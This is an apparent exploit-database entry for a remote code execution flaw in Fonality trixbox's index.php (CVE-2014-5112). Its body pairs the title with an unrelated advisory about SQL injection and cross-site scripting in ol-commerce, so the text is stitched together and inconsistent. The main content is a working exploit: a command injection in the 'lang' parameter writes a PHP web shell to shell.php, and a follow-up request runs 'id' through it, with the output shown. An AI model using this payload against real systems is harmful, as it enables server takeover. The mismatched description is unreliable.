Fonality trixbox - 'index.php' Remote Code Execution

Author: AtT4CKxT3rR0r1ST
type: webapps
platform: php
port: 
date_added: 2014-07-17  
date_updated: 2016-12-13  
verified: 1  
codes: CVE-2014-5112;OSVDB-109296  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 39352.txt  
source: https://www.securityfocus.com/bid/68719/info

ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ol-commerce 2.1.1 is vulnerable; other versions may also be affected.

Http://www.example.com/maint/modules/home/index.php?lang=MF;echo "<?php
system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php

Your Shell

Http://www.example.com/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D